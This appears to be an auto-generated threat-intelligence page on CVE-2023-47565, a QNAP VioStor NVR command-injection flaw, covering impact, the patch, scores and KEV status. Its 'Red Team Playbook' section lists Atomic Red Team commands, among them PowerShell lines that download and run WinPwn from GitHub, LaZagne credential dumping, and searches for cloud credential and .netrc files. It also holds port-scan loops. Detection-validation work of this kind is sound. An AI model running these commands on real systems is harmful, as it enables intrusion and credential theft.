CVE-2023-47565
Overview
This vulnerability is an OS command injection affecting legacy QNAP VioStor NVR devices running QVR Firmware 4.x. The root cause lies in insufficient input validation within the firmware's command execution routines, allowing crafted input to be interpreted as system commands. The affected component is the QVR Firmware's network-facing management interface that processes authenticated user commands.
Vulnerability Description
An OS command injection vulnerability has been found to affect legacy QNAP VioStor NVR models running QVR Firmware 4.x. If exploited, the vulnerability could allow authenticated users to execute commands via a network. We have already fixed the vulnerability in the following versions: QVR Firmware 5.0.0 and later
Impact
An attacker with valid user credentials can execute arbitrary operating system commands on the affected device remotely over the network. This capability enables full control over the device, including potential data exfiltration, system manipulation, or disruption of surveillance operations. The prerequisite is possession of an authenticated account on the device. Exploitation can lead to complete system compromise, undermining the confidentiality, integrity, and availability of the NVR system and its stored video data.
Solution
QNAP Systems Inc. has addressed this vulnerability in QVR Firmware version 5.0.0 and later. Users of legacy QVR Firmware 4.x on VioStor NVR models should upgrade to version 5.0.0 or newer promptly. Detailed patch instructions and advisory information are available at QNAP's official security advisory page: https://www.qnap.com/en/security-advisory/qsa-23-48. No alternative workarounds have been specified by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question is characterized as an OS command injection flaw affecting legacy QNAP VioStor NVR models operating on QVR Firmware 4.x. This type of vulnerability arises when an application improperly sanitizes user input, allowing an attacker to inject arbitrary commands that the operating system will execute. In this case, authenticated users can exploit the flaw to execute commands over the network, potentially leading to unauthorized access or control over the affected system. The implications of such a vulnerability are significant, especially in environments where video surveillance and data integrity are critical.
Attack vectors for this vulnerability primarily involve authenticated users who can access the management interface of the affected NVR models. Once authenticated, an attacker can craft specific input that exploits the command injection flaw, allowing them to execute system-level commands. This could include commands to manipulate files, alter configurations, or even install malicious software. Scenarios could range from a disgruntled employee attempting to sabotage surveillance footage to an external attacker who has gained access to the system through compromised credentials. The ease of exploitation, combined with the potential for significant damage, makes this vulnerability particularly concerning.
The real-world impact of this vulnerability can be profound, especially for organizations relying on QNAP VioStor NVR systems for security and surveillance. If exploited, an attacker could gain access to sensitive video feeds, manipulate recorded footage, or disrupt the operation of security systems. This could lead to breaches of privacy, loss of critical evidence in legal matters, and damage to an organization's reputation. Furthermore, the business risk extends beyond immediate operational concerns; organizations may face regulatory scrutiny and potential fines if they fail to protect sensitive data adequately. The high CVSS score of 8.8 underscores the severity of the threat, indicating that organizations must prioritize remediation.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, they should ensure that all systems are updated to QVR Firmware 5.0.0 or later, which addresses the vulnerability directly. Regular patch management is crucial in maintaining the security posture of any organization. Additionally, organizations should conduct security assessments and penetration testing to identify any potential weaknesses in their systems, including those related to input validation and user authentication. Monitoring network traffic for unusual activity can also help detect exploitation attempts early, allowing for a swift response to potential threats.
In conclusion, the OS command injection vulnerability affecting legacy QNAP VioStor NVR models poses a significant threat to organizations utilizing these systems. The potential for exploitation by authenticated users, combined with the severe impact on security and privacy, necessitates immediate attention. By prioritizing updates, conducting regular security assessments, and implementing robust monitoring practices, organizations can effectively mitigate the risks associated with this vulnerability and enhance their overall cybersecurity posture.
The CVSS score for CVE-2023-47565 has been revised downward from 8.8 to 8.0, reflecting a refined understanding of the vulnerability’s impact and exploitability. Concurrently, the Exploit Prediction Scoring System (EPSS) value has slightly decreased, indicating a marginal reduction in the likelihood of exploitation in the near term. These adjustments stem from ongoing analysis and the absence of new exploit developments or ransomware activity linked to this vulnerability. Although the risk remains classified as high, the updated metrics suggest a stabilization rather than escalation in threat actor interest or capability to exploit this OS command injection flaw. For defenders, this means that while vigilance remains critical, immediate exploitation pressure appears to be less intense than initially assessed. Our telemetry continues to show no significant increase in exploitation attempts, reinforcing the current risk posture as serious but controlled.
Update 2 — July 04, 2026
CSURFACE threat intelligence has identified a moderate increase in detection activity related to CVE-2023-47565, reflected in an upward revision of its CVSS score to 8.8. This adjustment underscores a heightened potential impact of the OS command injection vulnerability on legacy QNAP VioStor NVR devices. While the frequency of observed exploitation attempts remains stable without evidence of new exploit techniques or ransomware involvement, the elevated severity rating signals that adversaries could achieve more impactful outcomes if successful. The vulnerability’s inclusion in the KEV catalog further emphasizes its priority for monitoring and mitigation efforts. Consequently, the threat level is reaffirmed as high, with a nuanced indication that although exploitation pressure has not surged dramatically, the risk of significant operational disruption persists. Defenders should interpret this as a call to maintain rigorous surveillance and ensure affected systems are updated to the fixed firmware versions.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qnap | Qvr Firmware | All |
cpe:2.3:o:qnap:qvr_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
51%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-47565 |
| qnap.com |
GitHub CVE
|
https://www.qnap.com/en/security-advisory/qsa-23-48 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-47565 |